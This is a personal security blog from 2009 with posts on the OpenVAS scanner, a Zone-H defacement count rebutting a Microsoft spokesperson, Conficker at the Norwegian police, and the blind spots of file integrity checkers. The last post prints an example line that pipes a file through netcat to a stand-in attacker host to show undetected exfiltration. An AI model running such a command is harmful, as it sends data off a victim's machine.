03.20.09
Posted in Information, OpenSourceSoftware, Security, OpenVAS at 9:33 am by Edward Bjarte Fjellskål
OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.
OpenVAS products are Free Software under GNU GPL and a fork of Nessus.
The above is much cut and paste from the OpenVAS website. I’m writing this blog post because I have talked to many security professionals that miss-like that Nessus went closed source, and dont know about the OpenVAS fork.
OpenVAS-Server is a forked development of Nessus 2.2. The fork happened because the major development (Nessus 3) changed to a proprietary license model and the development of Nessus 2.2.x is practically closed for third party contributors. OpenVAS continues as Free Software under the GNU General Public License with a transparent and open development style.
And that is what we like, right?
Permalink
03.18.09
Posted in Information, OpenSourceSoftware, Linux Distributions, Debian, Ubuntu, Security at 12:21 pm by Edward Bjarte Fjellskål
Yesterday, Computerworld.no wrote an article on the Police/Conficker/Free software debate going on here in Norway.
Information director Eirik Lae Solberg at Microsoft Norway had a chance to comment:
“- If one had used a similar Linux distribution from the same time, one would have significant security issues.”
That is only true, if one did not upgrade! And in the GNU/Linux/Free Software world, one would not have any unmanageable issues upgrading.
I have personally managed lots of servers for large customers and universities, and when a new distribution release has been out,
take Debian as a very good example, you can change the source of packages from the current repository, to the new release repository.
And with some rather simple command line-fu, you can upgrade to the latest major Debian version.
Ubuntu has made this easy for the desktop users. Using a graphical front-end on your server (I dont), you can click your way to
a distribution upgrade.
I still recommend having people in the loop that has done such an upgrade, before you try this on your own. Always keep a
working backup, and you could even try the upgrade in a virtual machine, before you actually do it in production.
Eirik Lae Solberg even goes so far to claim that Zone-H.org shows that Linux is more `hacked` than Windows… Using Zone-H.org as a reliable source for such “scientific” statement, is just what Microsoft is known of doing. Well, just to let you all know, if you bother to check Zone-H.org by your self, this is what you might find today:
$ GET http://zone-h.org/archive/special=1/page=1|grep “<td>Linux”|wc -l
5
$ GET http://zone-h.org/archive/special=1/page=1|grep “<td>Win”|wc -l
7
As you see: Todays score is 5 boxes are Linux, and 7 are Windows.
I wrote a quick bash script (get it here)to check the first 30 pages and print out the total sum:
$ bash bin/Eirik_Lae_Solberg.sh
Total Linux: 289
Total Microsoft: 390
To summarize: On the last 30 pages from Zone-H, 289 websites running Linux OS got defaced, while 390 websites running on Windows OS got defaced.
(If you run the script yourself, the numbers will probably change - this was numbers from today)
So giving you the hard facts, and not marketing propaganda like Eirik Lae Solberg from Microsoft wants you to believe, make up your own mind, and don’t believe what ever you hear from Mister Microsoft…
BTW: Zone-H is not a good reference for measuring security in Operating Systems, if you didn’t know that… But it is a good way to point out that Eirik Lae Solberg don’t know much about Operating System security, and that he would rather focus on telling that Microsoft is way better than every body else…
For how long will you eat that lie?
Permalink
03.13.09
Posted in Information, OpenSourceSoftware, Security at 9:43 am by Edward Bjarte Fjellskål
I can not believe that my tax paying money, again is going to, *d0rks*…
If you don’t know anything about managing your IT systems, I would prefer that you outsource or find some consultants that do!
Especially if you’re in the Norwegian government, handling systems critically to the society.
This time, its the Norwegian Police department having a visit, from the now old, Conficker worm…
Read more here and here.
According to this article, the police is still using Microsoft Windows NT 4.0!!!!!!
The last security update for NT 4.0 was released in 2004.
And you wounder how this could happen? And will it ever happen again?
Or will worse thing happen?
Update, Update, Updates…..
Permalink
03.06.09
Posted in OpenSourceSoftware, Security at 11:35 am by Edward Bjarte Fjellskål
I was talking with two prominent security professionals today, and the topic of integrity checking was touched. Got some food for afterthoughts…
(For more info on integrity checking, see: http://en.wikipedia.org/wiki/Samhain_(software), http://en.wikipedia.org/wiki/Open_Source_Tripwire or http://www.ossec.net/main/about/ )
If you run full integrity checking on all your file systems, you will have a good knowledge of which changes that are made to your system. Changed files, new files, deleted files etc. But for common use, seeing that a temporary file is written to disk, say a PHP session, or looking at a temporary file created or files being changed once someone logs in, or log files that constantly gets new content and will be different each time your md5/sha1 them etc, might be just to much… or, if you have time.. good for you.
Thats why most file integrity checkers are “tuned” default to ignore *something*. So there should be places on the file system, that could have places to hide files from integrity checkers.
My point in all this, is that a file integrity checker alone, is not really giving you any real insight into *bad things on your machine*. Why ? Something might be in your memory… Take my last blog post as an example. This will give a shell on the system, but will not leave any new files, or change them, except for the apache log file though 
But each HTTP request would, so file integrity checking the live log file, would not make too much sens.
Say someone got a cmd/shell on your machine. Doing `cat somefile` would not default trigger any normal integrity checker. Then doing `"cat somefile" | nc evil-storage-machine.ru 80` would go unnoticed to a file integrity checker.
So you need something more…
Permalink
